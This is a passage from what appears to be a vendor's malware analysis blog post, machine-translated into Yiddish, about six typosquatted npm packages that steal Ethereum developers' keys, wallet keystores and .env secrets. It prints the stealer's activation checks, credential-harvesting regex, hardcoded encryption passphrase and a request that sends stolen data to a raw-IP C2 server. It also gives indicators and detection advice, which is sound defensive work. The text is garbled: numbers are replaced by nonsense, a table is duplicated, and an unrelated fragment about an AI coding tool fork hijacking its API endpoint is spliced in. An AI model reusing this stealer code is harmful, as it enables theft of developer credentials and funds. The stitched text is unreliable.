EVMDeFi npm טיפּאָסקוואַטינג אַטאַק גנבעט דעוועלאָפּער שליסלען

EVM/DeFi npm טיפּאָסקוואַטינג אַטאַק גנבעט דעוועלאָפּער שליסלען

טל; דר

דעם 6טן מאי, 2026, אן איינציקער npm ארויסגעבער, namikazesarada010206, האט ארויסגעגעבן זעקס בייזוויליגע פּעקלעך וואָס צילן די עטהערעום, סאָלידיטי, און דעפי דעוועלאָפּער עקאָסיסטעם.

די פּעקלעך, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, און web3-utils-core, האט גענוצט גלייבלעכע נעמען וואָס זענען דיזיינד צו אויסזען ווי הילף־ביבליאָטעקן פֿאַר פּאָפּולערע וועב3 מכשירים.

אַלע זעקס פּאַקעטן האָבן ענטהאַלטן דאָס זעלבע telemetry.js טעקע. די טעקע איז געווען בייט-אידענטיש איבערן גאנצן קלאסטער, מיט SHA-256:

SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1

די מאַלוואַרע אַרבעט נישט ביים אינסטאַלירן. עס איז נישטאָ קיין preinstall or postinstall קרוק. אנשטאט, עס אקטיווירט זיך ווען דער פעקל ווערט אימפארטירט דורך require().

יענע דעטאַל איז וויכטיק.

דער אימפּלאַנט וואַרט ביז אַ דעוועלאָפּער ניצט טאַקע דעם פּעקל. דערנאָך קאָנטראָלירט עס צי די וואָרקסטיישאַן זעט אויס ווי אַן עכטע עטהערעום / סאָלידיטי אַנטוויקלונג סביבה. עס זוכט נאָך אַלכעמי אָדער אינפֿוראַ שליסלען, פּריוואַטע שליסלען, mnemonics, דיפּלויער שליסלען, אָדער אַ לאָקאַלע Foundry דירעקטאָרי.

אויב דער באַלעבאָס פּאַסט, זאַמלט דער גנב SSH פּריוואַטע שליסלען, Foundry / Geth / Brownie וואָלעט שליסל-סטאָרעס, .env* טעקעס, און סענסיטיווע סביבה וועריאַבלען. עס ענקריפּץ דעם באַנדל מיט AES-256-GCM ניצנדיק אַ האַרדקאָדעד פּאַראָל און עקספילטרירט עס צו אַ רויע IPv4 C2 ענדפּוינט מיט TLS וועראַפאַקיישאַן דיסייבאַלד.

Xygeni'ס מאַלוואַרע ערלי וואָרנינג (MEW) סיסטעם האט באַשטעטיקט אַלע זעקס פּאַקאַדזשאַז ווי בייזוויליק. דער npm רעגיסטרי אַראָפּנעמען באַריכט באַנדל איז וואַרטנדיק.

דער קלאַסטער: זעקס פּאַקעטן, איין פֿאַרלעגער

דער ארויסגעבער חשבון namikazesarada010206 איז געווען פארבונדן מיט דער נישט-באשטעטיגטער דזשימעיל אדרעס namikazesarada010206@gmail.com.

די קאמפיין איז ארויסגעקומען אלס אן איינטאגיקע פובליקאציע דעם 6טן מאי, 2026. אלע זעקס פעקלעך זענען ווערסיעד געווארן אלס 1.0.0, האט געהאט נול ראַנטיים דיפּענדאַנסיז, און האט געשיקט בלויז דריי טעקעס:

package.json index.js telemetry.js

זיי האבן אויך דערקלערט די זעלבע מקור רעפאזיטארי:

https://github.com/harunosakura030303-maker/evmchain-config

די ערשטע דריי פּעקלעך זענען געכאפט געוואָרן דורך MEW סקאַנערס בײַ דער ערשטער פּובליקאַציע. די איבעריקע דריי זענען געצוואונגען געוואָרן צו פֿלאַגן נאָך אַן אַנאַליסט איבערבליק פֿון דעם פּובלישערס npm פּראָפֿיל. אַמאָל די זעלבע בײַט-אידענטיש telemetry.js איז באשטעטיקט געווארן איבערן גאנצן קלאסטער, זענען זיי פארמאכט געווארן אלס בייזוויליג דורך קאנסיסטענסי.

פּעקל ווערסיע npm ארויסגעגעבן MEW בילעט ווערדיקט
וויעם-קאָר 1.0.0 2026-05-06 01:38:44Z # קסנומקס בייזע
וויעם-יוטילס-קאָר 1.0.0 2026-05-06 # קסנומקס בייזע
האַרדהאַט-קאָר-יוטילס 1.0.0 2026-05-06 # קסנומקס בייזע
evm-utils 1.0.0 2026-05-06 # קסנומקס בייזוויליק, דורך קאָנסיסטענסי
גיסעריי-יוטילס 1.0.0 2026-05-06 # קסנומקס בייזוויליק, דורך קאָנסיסטענסי
וועב3-יוטילס-קאָר 1.0.0 2026-05-06 # קסנומקס בייזוויליק, דורך קאָנסיסטענסי

די נאַמינג סטראַטעגיע איז פּשוט אָבער עפעקטיוו.

די פּעקלעך מאַכן נישט אויס גענויע אויבערשטע נעמען. אַנשטאָט, נוצן זיי גלייבלעכע "נוצלעכקייט" סופיקסן ווי -core, -utils, און -utils-coreדאָס מאַכט זיי אויסזען ווי באַגלייטער ביבליאָטעקן וואָס אַ דעוועלאָפּער קען דערוואַרטן צו זען נאָענט צו וועב3 מכשירים.

בייזוויליקע פּעקל לעגיטימע ציל
וויעם-קאָר viem, א פאפולערער עטהערעום טייפסקריפּט קליענט
וויעם-יוטילס-קאָר וויעם
האַרדהאַט-קאָר-יוטילס האַרדהעט, אַ הויפּטשטראָם סאָלידיטי אַנטוויקלונג סביבה
evm-utils אלגעמיינע EVM טולינג נעמענספּייס
גיסעריי-יוטילס גיסעריי, א סאָלידיטי טולקיין
וועב3-יוטילס-קאָר וועב3-יוטילס, וועב3.דזשעי העלפערס

דאָס איז דער "צוגאב פּעקל" מוסטער: נישט "איך בין דער עכטער פּעקל," נאָר "איך זע אויס ווי אַ פֿאַרשטענדלעכער העלפֿער אַרום דעם עכטן פּעקל."

פֿאַר DeFi דעוועלאָפּערס וואָס רירן זיך שנעל, איז דאָס גענוג צו שאַפֿן ריזיקע.

וואָס פּאַסירט ווען דער פּעקל ווערט אימפּאָרטירט

די אטאקע קייט איז קליין, באוואוסטזיניק, און פאקוסירט אויף קריפּטאָ-אנטוויקלונג סביבות.

עס איז נישטאָ קיין אינסטאַלאַציע קרוק. אַנשטאָט, יעדער פּעקל כולל אַ index.js וואָס עקספּאָרטירט סטאַב פאַנגקשאַנאַליטי און דאַן לאָודז די בייזוויליקע טעלעמעטריע מאָדול.

require('./telemetry').init();

דאָס מיינט אַז די מאַלוואַרע אַקטיוויזירט זיך בײַם ערשטן אימפּאָרט.

דאָס איז אָפּעראַציאָנעל נוצלעך פֿאַר דעם אַטאַקער. פילע סקאַנערס און סאַנדבאָקסעס פאָקוסירן אויף אינסטאַלירן-צייט נאַטור. דאָס פּעקל וואַרט ביז עס ווערט טאַקע גענוצט דורך אַ דעוועלאָפּער, בילד סקריפּט, טעסט סוויט, אָדער ראַנטיים פּאַט.

אַקטיוואַציע טויער: נאָר פייערן אויף עכטע וועב3 דעוועלאָפּער וואָרקסטיישאַנז

דער וויכטיגסטער טייל פון דעם אימפּלאַנט איז דער אַקטיוואַציע טויער.

די מאַלוואַרע טשעקט פֿאַר סביבה וועריאַבאַלן וואָס מען טרעפט געוויינטלעך אויף עטהערעום / סאָלידיטי דעוועלאָפּער מאשינען:

const indicators = [   process.env.ALCHEMY_API_KEY,   process.env.INFURA_KEY,   process.env.PRIVATE_KEY,   process.env.MNEMONIC,   process.env.DEPLOYER_KEY, ].filter(Boolean);

עס קאָנטראָלירט אויך צי פאַונדרי שיינט צו זיין אינסטאַלירט:

fs.existsSync(path.join(os.homedir(), '.foundry'))

אויב קיין איינע פון ​​די באדינגונגען איז נישט אמת, גיט די פונקציע צוריק און טוט גארנישט.

דאָס מאַכט דעם פּעקל שטילער אין אַלגעמיינע אַנאַליז סביבות. אַ זאַמדקאַסטן אָן Foundry, Alchemy שליסלען, Infura שליסלען, פּריוואַטע שליסלען, אָדער mnemonics קען זען אַן אומשעדלעכן-אויסזעענדיקן אימפּאָרט.

אויף אַ פּאַסיקן האָסט, וואַרט די מאַלווער 60 ביז 90 סעקונדעס איידער עס ווערט געזאַמלט:

setTimeout(() => { try { _collect(); } catch {} },           60000 + Math.random() * 30000).unref();

די פארשפעטיגונג פארקלענערט די קלארע קארעלאציע צווישן אימפארט און עקספילטראציע. .unref() `call` לאָזט אויך דעם האָסט פּראָצעס נאָרמאַל אויסגיין אויב דער פּעקל איז אימפּאָרטירט געוואָרן אין אַ קורץ-לעבעדיקן סקריפּט.

דאָס איז נישט קיין גערוישפולע "סמאַש-ענד-גראַב" נאַטור. דאָס איז אַ צילגעריכטעטער גנב וואָס איז דיזיינד צו ויסמיידן עס צו לויפן סיידן די דעוועלאָפּער סביבה איז ווערט צו גנבענען פון.

וואָס דער גנב זאַמלט

אזוי שנעל ווי דער אקטיוואציע טויער גייט אדורך, זאמלט זיך די מאלווער פון די קוועלער וואס זענען וויכטיגסט אין וועב3 אנטוויקלונג: פריוואטע שליסלען, וואלעט קי-סטארס, דיפּלוימענט קרעדענשעלס, וואלקן סודות, npm טאקענס, און לאקאלע פראיעקט קאנפיגוראציע.

מאָקער וואָס ווערט געזאַמלט
פּראָצעס.ענוו יעדע וועריאַבל וואָס פּאַסט צו /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i
~/.ssh/* טעקעס מיט PRIVATE KEY אדער BEGIN OPENSSH, אריינגערעכנט די פולע טעקע אינהאַלט
~/.פאונדרי/שליסל-געשעפטן/* פאַונדרי בייַטל קיסטאָר טעקעס
~/.עטהערעום/קיסטאָר/* געטה בייטל קיסטאָר טעקעס
~/.בראַוניע/אַקאַונטס/* בראַוני בייטל קיסטאָר טעקעס
${cwd}/.env גאַנצע טעקע אינהאַלט
${cwd}/.env.local גאַנצע טעקע אינהאַלט
${cwd}/.env.production גאַנצע טעקע אינהאַלט
${cwd}/.env.development גאַנצע טעקע אינהאַלט
os.האָסטנאַמע() האָסט מעטאַדאַטאַ
קריפּטאָ.ראַנדאָםUUID() קרבן/סעסיע אידענטיפיצירער
דאַטע.איצט() זאַמלונג צייטשטעמפּל
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com

די ATTA טאָקענס זענען:

ATTA_ID 00400014144 ATTA_TOKEN 6478159937

מיר האָבן נישט געקענט באַשטעטיקן צי די טעלעמעטריע איז געווען דער אָפּעראַטאָר'ס אייגענע אַנאַליטיקס אָדער אַ באַזונדער מאָנעטיזירטער קאַנאַל. די ATTA טאָקענס זענען די זעלבע אין ביידע מוסטערן וואָס מיר האָבן אויסגעפאָרשט.

קלאַסטער ב: העיבאַי

claude.hk OAuth פישינג + ANTHROPIC_BASE_URL כיידזשעק

דער 1טן אפריל מוסטער איז דער גראָבערער, ​​פריערדיקער אָרעם פון דער קאַמפּיין.

heibai:2.1.88-claude.hk-4 איז ארויס ביי wuguoqiangvip28, אַן אַקאַונט באשאפן דעם 7טן יוני 2025. דער פּעקל האט זיך עקספּליציט ווערסיעד קעגן דעם לעגיטימען 2.1.88 אַנטראָפּישע באַפֿרײַונג.

עס שטערט נישט CA-cert MITM. אנשטאט, ליגט עס צום באַניצער וועגן דעם OAuth ענדפּוינט.

די בייזוויליגע צוגאבן אויף שפּיץ פון די ליקט קלאוד קאָוד מקור אַרייַננעמען:

מאָקער וואָס ווערט געזאַמלט
פּראָצעס.ענוו יעדע וועריאַבל וואָס פּאַסט צו /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i
~/.ssh/* טעקעס מיט PRIVATE KEY אדער BEGIN OPENSSH, אריינגערעכנט די פולע טעקע אינהאַלט
~/.פאונדרי/שליסל-געשעפטן/* פאַונדרי בייַטל קיסטאָר טעקעס
~/.עטהערעום/קיסטאָר/* געטה בייטל קיסטאָר טעקעס
~/.בראַוניע/אַקאַונטס/* בראַוני בייטל קיסטאָר טעקעס
${cwd}/.env גאַנצע טעקע אינהאַלט
${cwd}/.env.local גאַנצע טעקע אינהאַלט
${cwd}/.env.production גאַנצע טעקע אינהאַלט
${cwd}/.env.development גאַנצע טעקע אינהאַלט
os.האָסטנאַמע() האָסט מעטאַדאַטאַ
קריפּטאָ.ראַנדאָםUUID() קרבן/סעסיע אידענטיפיצירער
דאַטע.איצט() זאַמלונג צייטשטעמפּל

די ציל ליסטע איז זייער ספעציפיש. דאס איז נישט קיין אלגעמיינע בראוזער גנייווע אדער ברייטע קרעדענשאַל סקראַפּינג. עס איז געצילט אויף דעוועלאָפּערס וואָס בויען, טעסטן, דיפּלויען אָדער אָפּערירן עטהערעום אַפּליקאַציעס.

די ארייננעמונג פון Foundry, Geth, און Brownie קיסטאָרס איז ספּעציעל וויכטיק. די טעקעס קענען רעפּרעזענטירן דירעקטן צוטריט צו וואָלאַץ אָדער דיפּלוימאַנט אידענטיטעטן. אויב דער אַטאַקער קען זיי צוזאַמענשטעלן מיט פּאַסווערדער, mnemonics, אָדער סביבה סודות, קענען זיי מעגלעך אַריבערפירן געלטער, זיך אויסגעבן ווי דיפּלויערס, אָדער קאָמפּראָמיטירן סמאַרט קאָנטראַקט אָפּעראַציעס.

ענקריפּשאַן איידער עקספילטראַציע

די מאַלוואַרע ענקריפּץ די געזאַמלטע דאַטן איידער עס שיקט עס אַרויס.

const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv);

די האַרטקאָדירטע פּאַראָל איז:

a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d

די לעצטע פּיילאָוד איז אַרומגעוויקלט ווי JSON:

{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"}

ענקריפּשאַן מאַכט נישט די מאַלווער מער אַוואַנסירט אַליין. אָבער עס מאַכט נעץ דורכקוק שווערער. אַ פאַרטיידיקער וואָס וואַכט אויף די אַרויסגאַנג וואָלט זען אַ JSON פּיילאָוד, אָבער נישט די גע'גנב'עטע שליסלען, וואָלעט טעקעס, אדער .env אינהאַלט אָן די האַרדקאָדירטע פּאַסוואָרט און דעקריפּטאַציע לאָגיק.

עקספילטראַציע צו אַ רוי IPv4 C2

דער עקספילטראַציע וועג איז האַרדקאָדירט:

const req = https.request({   hostname: '76.13.37.80', port: 8443,   path: '/api/v1/telemetry', method: 'POST',   headers: { 'Content-Type': 'application/json', ... },   rejectUnauthorized: false, timeout: 8000, }, () => {});

די מאַלוואַרע שיקט דאַטן צו:

https://76.13.37.80:8443/api/v1/telemetry

צוויי דעטאַלן שטייען ארויס.

ערשטנס, די C2 איז א רויע IPv4 אדרעס אנשטאט א דאמעין. דאס נעמט אוועק די נויטווענדיקייט פון דאמעין רעגיסטראציע און פארמיידט געוויסע דאמעין-באזירטע דעטעקציעס.

צווייטנס, TLS וועריפיקאציע איז אפגעשטעלט מיט:

rejectUnauthorized: false

דאָס ערלויבט די מאַלווער צו אָננעמען יעדן סערטיפיקאַט, אַרייַנגערעכנט זעלבסט-אונטערגעשריבענע סערטיפיקאַטן. מיט אַנדערע ווערטער, דער אַטאַקירער באַקומט ענקריפּטעד טראַנספּאָרט אָן צו דאַרפֿן אַ גילטיקן עפנטלעכן סערטיפיקאַט.

עס איז נישטאָ קיין ריטריי לאָגיק און קיין פאַלבעק האָסט. טעותים ווערן שטילערהייט געשלונגען. דאָס האַלט דעם פּאַקעט שטיל אויב דער C2 איז אָפפליין אָדער נישט דערגרייכלעך.

פארוואס דאָס קאַמפּיין איז וויכטיק

רובֿ בייזוויליקע npm פּעקלעך געצילט אויף דעוועלאָפּערס יאָגן ברייטע קרעדענשאַלז: npm טאָקענס, AWS שליסלען, GitHub טאָקענס, אדער .npmrc טעקעס.

די קאמפיין פארענגט דאס ציל.

עס זוכט סימנים אז די מאשין געהערט צו אן עטהעריום אדער סאלידיטי דעוועלאפער. דערנאך נעמט עס ארויס פונקט די רעסורסן וואס זענען וויכטיג אין יענער סביבה: בייטל קי סטארס, פריוואטע שליסלען, mnemonics, דיפלויער שליסלען, .env טעקעס, און SSH שליסלען.

דאָס מאַכט די קאַמפּיין מער געפערלעך פֿאַר וועב3 טימז ווי אַ גענעראַלער npm גנב.

א געלונגענע אינפעקציע קען אויפדעקן:

  • דיפּלוימאַנט וואָלאַץ
  • קלוגע קאנטראקט אדמין שליסלען
  • RPC פּראַוויידער שליסלען
  • קלאָוד דיפּלוימאַנט קראַדענטשאַלז
  • npm פּובליקאַציע טאָקענס
  • SSH צוטריט צו דעוועלאָפּער אָדער בויען אינפראַסטרוקטור
  • פּראָיעקט סודות געהיט אין .env טעקעס
  • בייטל שליסל-געשעפטן פאר פאַונדרי, געט, אדער בראַוני

די פּעקעדזש נעמען ווײַזן אויך קלאָרע סאָציאַלע אינזשעניריע. זיי צילן דעם וועב3 דעוועלאָפּער עקאָסיסטעם דורך באַקאַנטע מכשירים נעמען: viem, hardhat, foundry, evm, און web3.

דער אַקטיאָר דאַרף נישט קאָמפּראָמיסירן די עכטע פּראָיעקטן. זיי דאַרפן נאָר אַ דעוועלאָפּער צו אינסטאַלירן וואָס זעט אויס ווי אַ פּאַסיק באַגלייטער פּאַקעט.

אינדיקאַטאָרן פון קאָמפּראָמיס און דעטעקציע

פּאַקעטן און פֿאַרלעגער
פעלד ווערט
npm ארויסגעבער נאַמיקאַזעזאַראַדאַ010206
ארויסגעבער אימעיל namikazesarada010206@gmail.com
Email וועראַפייד ניין
SCM וועראַפייד ניין
רעפּוטאַציע כעזשבן 1.0
פּאַקקאַגעס viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, web3-utils-core
ווערסיעס All 1.0.0
מקור רעפּאָזיטאָרי https://github.com/harunosakura030303-maker/evmchain-config
באַשטעטיקט בייזוויליק אַלע זעקס פּאַקעטן
נעץ
טיפּ ווערט
C2 ענדפּוינט https://76.13.37.80:8443/api/v1/telemetry
C2 IP 76.13.37.80
C2 פּאָרט 8443/טקפּ
TLS נאַטור אָפּוואַרפןנישט ערלויבט: פאַלש
פּיילאָוד סכעמע {"v":2,"iv": "ד": "ט": }
טעקעס און העשעס
טיפּ ווערט
טעלעמעטריע.דזשעי.עס.עי.-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1
פּעקל אויסלייג פּעקל.דזשאָן, אינדעקס.דזש, טעלעמעטריע.דזש
טעקע ציילן 3
אומגעפערע גאַנצע גרייס קסנומקס קב

אַקטיוואַציע סיגנאַלן

די מאַלוואַרע קאָנטראָלירט די פאלגענדע סביבה וועריאַבאַלן:

ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY

עס טשעקט אויך פֿאַר:

~/.foundry/

צילגעריכטע באַלעבאָס פּאַטס

~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development

זאַמלונג רעגעקס

/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i

דעטעקציע נאטיצן

עטלעכע כּללים כאַפּן די קאַמפּיין אָן קיין נויט פֿאַר אַ פֿולע נאַטור-אַנאַליז.

ערשטנס, סקענט לאקפיילן פאר די זעקס בייזע פעקל נעמען:

viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core

יעדע גלייכונג אין package-lock.json, yarn.lock, pnpm-lock.yaml, אדער node_modules געשיכטע זאָל באַהאַנדלט ווערן ווי אַ ערנסטע אינצידענט.

צווייטנס, מאָניטאָרירן פֿאַר Node.js פּראָצעסן וואָס לייענען וואָלאַט קיסטאָר פּאַטס:

~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/

דאָס איז זעלטן לעגיטימע נאַטור פֿאַר אַ פּעקל וואָס ווערט אימפּאָרטירט ווי אַ העלפער-דעפּענדענסי. עס איז ספּעציעל פֿאַרדעכטיק ווען עס ווערט נאָכגעפֿאָלגט דורך אַרויסגייענדיקע נעץ-אַקטיוויטעט.

דריטנס, בלאקירן אדער ווארענען אויף HTTPS קאנעקשאנס צו:

76.13.37.80:8443

ספּעציעל ווען דער בקשה וועג איז:

/api/v1/telemetry

פערטנס, זוכט נאָך npm פּעקלעך וואָס קאָמבינירן די טרייץ:

  • פרישער אדער נידעריג-רעפוטאציע ארויסגעבער
  • נישט-באשטעטיגטע דזשימעיל אקאונט
  • וועב3-נאכגעבונדענע פּעקל נאָמען
  • קיין באַדײַטנדיקע געשיכטע פֿון רעפּאָזיטאָריעס נישט
  • קליינע פּעקל אויסלייג
  • index.js וואָס לאָודט אַ טעלעמעטריע אָדער העלפער טעקע
  • קיין ראַנטיים דיפּענדאַנסיז
  • סענסיטיווע סביבה-וועריאַבאַל זאַמלונג
  • צוטריט צו בייטל שליסל-סטאָר

דאס מוסטער איז מער נוצלעך ווי איין IOC ווייל דער נעקסטער פעקל קען ענדערן די IP אדרעס אבער האלטן די זעלבע ציל-לאגיק.

קאָמפּראָמיס רעספּאָנס טשעקליסט

אויב אַ דעוועלאָפּער האָט גענוצט איינע פֿון די זעקס פּאַקאַדזשאַז און זייער סביבה האָט זיך געפּאַסט צום אַקטיוואַציע טויער, זאָל מען באַהאַנדלען די וואָרקסטיישאַן ווי קאָמפּראָמיטירט.

דאָס נעמט אַרײַן מאַשינען מיט Foundry אינסטאַלירט, אַלכעמי אָדער אינפֿוראַ שליסלען אין דער סביבה, פּריוואַטע שליסלען, mnemonics, אָדער דיפּלויער שליסלען.

רעקאָמענדירטע ענטפער:

  • דיסקאָנעקט דעם האָסט פֿון נעץ.
  • ופהיטן node_modules, לאקפיילן, שאָל געשיכטע, און באַטייַטיק לאָגס פֿאַר פאָרענסיק.
  • דריי יעדע SSH שליסל-פּאָר אונטער ~/.ssh/.
  • ראָטירן בייַטל שליסלען פֿאַר יעדן שליסל-סטאָר אונטער ~/.foundry, ~/.ethereum, און ~/.brownie.
  • אַריבערפֿירן געלטער צו פֿרישע בײַטלעך.
  • דריי יעדן סוד וואָס איז געהיט אין .env* טעקעס אין רעפּאָזיטאָריעס אין וועלכע דער דעוועלאָפּער האָט געאַרבעט.
  • ראָטירן סביבה סודות וואָס פּאַסן צו די זאַמלונג רעגעקס, אַרייַנגערעכנט AWS שליסלען, npm טאָקענס, דיפּלוי טאָקענס, API שליסלען, פּריוואַטע שליסלען, זאמען, און mnemonics.
  • אוידיט קלאָוד, npm, GitHub, RPC פּראַוויידער, און בלאָקטשיין טעטיקייט זינט די פּאַקעט איז געווען ערשטער אינסטאַלירט.
  • מאַך אַ נייע בילד פֿון דער וואָרקסטיישאַן איידער איר ניצט עס ווידער.

וואָס פֿאַרטיידיקער זאָלן אַוועקנעמען

די קאמפיין ווייזט ווי npm טיפּאָסקוואַטינג עוואַלוירט אַרום הויך-ווערט דעוועלאָפּער עקאָסיסטעם.

דער אַקטיאָר האָט נישט געדאַרפט קיין אָנהאַלטונג. זיי האָבן נישט געדאַרפט קיין פֿאַרקלעמונג. זיי האָבן ניט אַפֿילו געדאַרפט קיין אויספֿירונג בעת דער אינסטאַלאַציע.

אנשטאט, האבן זיי זיך פארלאזט אויף דריי זאכן:

  • גלייבלעכע וועב3 פּעקל נעמען
  • אַקטיוואַציע נאָר אויף עכטע קריפּטאָ-אַנטוויקלונג מאשינען
  • דירעקטע גנייווע פון ​​די טעקעס און סודות וואָס זענען וויכטיק פֿאַר עטהערעום דעוועלאָפּערס

דאָס מאַכט די קאַמפּיין גרינג צו פֿאַרפֿעלן אין ברייט סקאַנינג און געפערלעך ווען עס לאַנדט אין דער ריכטיקער סביבה.

פֿאַר וועב3 טימז, איז די לעקציע קלאָר: באַהאַנדלט אָפּהענגיקייט נעמען ווי אַ טייל פֿון אייַער סאַקאָנע מאָדעל. אַ פּעקל וואָס קוקט אויס ווי אַן ומשעדלעכער העלפֿער קען נאָך ווערן דער קירצסטער וועג צו אַ וואָלעט קאָמפּראָמיס.

געמאָלדן צום npm רעגיסטרי. מיר וועלן דערהייַנטיקן דעם פּאָסטן ווען דער פאַרלעגער חשבון און פּאַקאַדזשאַז וועלן אַוועקגענומען ווערן.

סקאַ-טולס-סאָפֿטווער-קאָמפּאָזיציע-אַנאַליז-טולס
פּריאָריטיזירן, פאַרריכטן און זיכערן אייערע ווייכווארג ריזיקעס
באַקומען דיין פריי חשבון.
קיין קרעדיט קאַרטל פארלאנגט.

זיכערן אייער ווייכווארג אנטוויקלונג און ליפערונג

מיט Xygeni פּראָדוקט סוויט